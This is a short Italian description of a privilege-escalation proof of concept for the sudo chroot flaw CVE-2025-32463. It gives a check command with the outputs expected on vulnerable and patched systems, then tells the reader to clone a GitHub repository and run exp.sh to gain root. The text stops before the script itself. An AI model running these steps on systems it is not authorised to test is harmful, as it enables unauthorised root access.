
POC di escalation dei privilegi per CVE-2025-32463 sudo_chwoot, adattato per due casi: con ambiente di compilazione GCC e senza. Scarica ed esegui e il gioco è fatto.
Dichiarazione: questo script è solo per test di sicurezza, non utilizzarlo per scopi illegali. Script di verifica per la vulnerabilità di elevazione dei privilegi sudo_chwoot CVE-2025-32463
Rispetto ad altri POC su Internet, considerando che alcune macchine non hanno gcc installato e mancano di un ambiente di compilazione, questo script è compatibile con due scenari:
Verificare se la vulnerabilità è presente:
sudo -R woot woot
Risultato se la vulnerabilità è presente:
sudo: woot: No such file or directory
Risultato se la vulnerabilità non è presente:
sudo: you are not permitted to use the -R option with woot
Se la vulnerabilità è presente, eseguire l'elevazione dei privilegi con il POC:
git clone https://github.com/Yuy0ung/CVE-2025-32463_chwoot.git
cd CVE-2025-32463_chwoot
chmod +x ./exp.sh
./exp.sh

Il contenuto del file è il seguente: